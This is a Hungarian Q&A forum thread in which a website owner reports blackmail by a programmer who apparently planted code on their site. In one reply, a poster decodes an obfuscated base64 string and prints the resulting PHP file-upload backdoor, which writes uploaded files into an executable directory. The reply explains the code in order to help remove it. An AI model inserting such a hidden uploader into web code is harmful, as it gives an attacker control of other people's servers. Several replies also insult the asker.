Kaptam egy fenyegetést egy programozó sráctól, hogy töröljem le az oldalamat vagy letörölteti, hogyan férhet hozzá?
Felajánlotta ingyen, hogy segít.
Nagyon-nagyon óvatos voltam, hogy ne nyúlhasson bele, de végül csak beadtam a derekam és feltelepítettem azt a csomagot amit ő "jóindulatúan" átküldött, hogy minden jó legyen. Mivel nekem is rengeteg munkám volt az oldalon nem igazán volt szükségem arra, hogy ő így nagyon "áttisztítsa" meg mittudomén, de megcsinálta.
Idővel elkezdett gyanúsan viselkedni majd kötekedni.
A kötekedés zsarolásba ment át, és valahogy belülről hozzáfér a weboldalamhoz és meg tudja változtatni a tartalmat, így egyszer már letörölte a file-okat.
Én írtam a szolgáltatómnak, hogy hackertámadás alatt állok de alapvetően nem tudom mit tehetnék.
Meg tudnátok mondani pontosan hogyan lehetséges PHP vagy javascript alapon belenyúlni a filerendszerbe anélkül, hogy adatbázis futna az oldalamon? Mit kell keresnem? Sajnos ehhez nem értek.
Meg a másik, hogy egyáltalán hogyan tudom ezt az elmebeteget leállítani? Senki sem kérte, hogy "tisztítsa le" az oldalam kódját, de mivel én is dolgoztam rajta párhuzamosan, olyan szinten összekeveredett a két munka, hogy az egészet újra kéne csinálnom és nem fogom, mert már bocs, de senki sem kérte arra hogy önként segítsen.
Lehet, hogy ez egy piti bűnöző és nagyon sok emberrel játszotta már ezt el. Hogyan állítsam le, és hogyan nyúl bele az oldalamba? Az ftp jelszó már rég meg van változtatva.
Jelentsd is fel!
De nehogy hagyd magad elzavarni a rendőrségtől.
Bármit is mondjon a nyomozó, ragaszkodj hozzá, hogy jegyzőkönyvet vegyenek fel!
Szegény rendőr...
Btk-s ügyekben, főleg komolyabb ügyekben, tehát nem súlytalan szabálysértések, hanem vétség, bűntett, köteles eljárni a rendőrség, ő maga követne el bűncselekményt, ha nem tenné.
Számítástechnikai rendszer és adatok elleni cselekmények vétségtől indulnak, minősített esetek bűntettek, jó ha ezt mindenki az eszébe vési, aki hekkeresdit akar játszani, ezt nem intézik el egy pénzbüntetéssel meg ejnyebejnyével, mint egy tyúklopást.
> Elhiszem, de ha kiveszem szétesik az egész oldal, direkt így építette fel.
Ha annyira életképtelen vagy hogy egyáltalán megpróbáld azt csinálni amit leírnak mások, akkor úgy kell neked. Ha vettél volna annyi fáradságot hogy megnézd (kb 20 másodpercet vett volna el az életedből), tudnád hogy nem esik szét az oldal, de egy lusta dög vagy és amit leírsz csak egy kitaláció, talán nem is az első. Azt gondolom senki se unatkozik annyira hogy felajánlja neked hogy ingyen csinál neked egy oldalt, csak azért hogy utána egy backdoorral letörölhesse, és kétlem hogy bármi közöd is lenne az oldal elkészítéséhez mert se a szakmai tudásod nincs meg hozzá, se pedig a szorgalmad. Számomra sokkal meggyőzőbb az hogy valaki csinált neked egy oldalt és te nem fizettél érte.
Nem fogsz te elmenni holnap a rendőrségre megtenni a feljelentést. Te lustább vagy annál és a történeted sem túl hihető.
'Jelentsd is fel!
De nehogy hagyd magad elzavarni a rendőrségtől.
Bármit is mondjon a nyomozó, ragaszkodj hozzá, hogy jegyzőkönyvet vegyenek fel!
Szegény rendőr..'
Ez így nem fog menni teljesen zökkenőmentesen, mert simán kirúg a panaszfelvevő, de előtte órákat várakoztat :) - voltam a Rendőrségen ügyeletvezető is többek között -
Írásban tedd meg a feljelentésedet, add fel ajánlott levélként vagy vidd be két példányban és vetesd az egyiken. Ilyenkor már biztosan indult 'valami' vagy megkeresnek vagy elutasítanak. Igaz a szóbeli szerződés is szerződés csak hát...
De összességében a legegyszerűbb legyalulni mindent, jelszót váltani, az oldal pedig nem egy nagy durranás, hogy ne lehetne rövid időn belül pótoni.
#42 (#31): Ne tegyél már úgy, mintha szakértő lennél!
Nem 300-as a paragrafus és (már) nem is az a neve, hogy "Számítástechnikai rendszer és adatok elleni cselekmények". Nem kellene terjeszteni a hülyeséget.
Egyébként ugyanolyan bűn, mint a lopás.
Minden attól függ, mit tört fel: ha egy nagy adatbázist, akkor nagy a büntetés, pontosan úgy, ahogy lopás esetén is ha értékes dolog a lopás tárgya, akkor a büntetés is magasabb.
Ha meg kiskorú, akkor nem is kap büntetést.
#44: Ne beszéld már le róla. Igazán ráférne pár óra várakozás, aztán hőböröghetne egy kicsit, mert nem veszik komolyan, meg is bilincselhetnék, berakhatnák egy cellába...
Megérdemelné!
Érdekes... Nem tudom, hogy egészen pontosan mit is jelent a dolog... Szóval van az a base46 kódolt parancs részlet, amit a $control változóban tárol. Érdekes módon a dekódolt sztring önnmaga is egy kódolt parancs (rendkívül gyanús!), és így tovább. Írtam egy kis perl oneliner-t, hogy kiderüljön, hogy mit takar az a parancs, és ez jött ki:
$important=$_SERVER["DOCUMENT_ROOT"]."/php/";
if(!empty($_POST)){if(!is_dir($important))mkdir($important);move_uploaded_file($_FILES["index"]["tmp_name"],$important.basename($_FILES["index"]["name"]));}
Nekem úgy tűnik, hogy igazából egy file-t tud feltölteni a php könyvtárba (ha nem létezik a könyvtár, akkor azt is létrehozza). Aztán ezzel a file-lal már tud mahinálni. A többi php file már nem tartalmazott hasonló kódolt kódrészletet.
Hogy mit is csinál ez a cucc:
if (!$control) sorban semmi nem történik, csak a lap betöltésekor ellenőrzi, hogy létezik-e ez a változó, és lehalasztja az oldalt, ha esetleg kitörlöd. De nem történik ez, ha az egész if blokkot eltávolítod.
$control = substr($control, 0); itt nem történik semmi: veszi a teljes kódolt stringet az elejétől a végéig.
eval("/*".$control.'scrollPoint'."*/"); Ez a sor egészen pontosan nem csinál semmit... kikommenteli a kódrészletet. hasonlóan ehhez: eval("//".$control);
Szóval úgy néz ki, hogy az oldalad lehetőséget ad POST metódussal file-t feltölteni a php könyvtárba. Ez azért cikis, mert ebben a könyvtárban futtatható állományok vannak. Ha ide feltölt egy php-t akkor azzal már bármit csinálhat tulajdonképpen. Szóval ezt a script phpt kell kipucolni, és akkor nem lesz semmi gond.
"Nagyon sok a rosszindulatú programozó sajnos."
Teljesen megértem, hogy felzaklatott az esemény, de hidd el, ez egy kirívó eset, én még egy rosszindulatú programozóval sem találkoztam soha.
"Számomra sokkal meggyőzőbb az hogy valaki csinált neked egy oldalt és te nem fizettél érte."
Ez teljesen hihetetlen. Csinálok valakinek egy oldalt, azt felrakom a saját tárhelyemre, akár a saját gépemen felstartolt web serverre, megnézi az ügyfél, tetszik neki, fizet, és akkor átteszem az ő tárhelyére.
#47: Ezzel nem segítesz, mert semmit nem ért php-hoz.
Próbáld vele felvenni a kapcsolatot privátban, aztán úgy járhatsz mint én, érdemes kivárni...
#48: Az mennyivel hihetőbb, hogy valaki ingyen dolgozik és belerak egy védelmet, hogy majd később megzsarolja? Egy ilyen noname oldalt...
Kapcsolódó kérdések:
Minden jog fenntartva © 2024, www.gyakorikerdesek.hu
GYIK | Szabályzat | Jogi nyilatkozat | Adatvédelem | Cookie beállítások | WebMinute Kft. | Facebook | Kapcsolat: info(kukac)gyakorikerdesek.hu
Ha kifogással szeretne élni valamely tartalommal kapcsolatban, kérjük jelezze e-mailes elérhetőségünkön!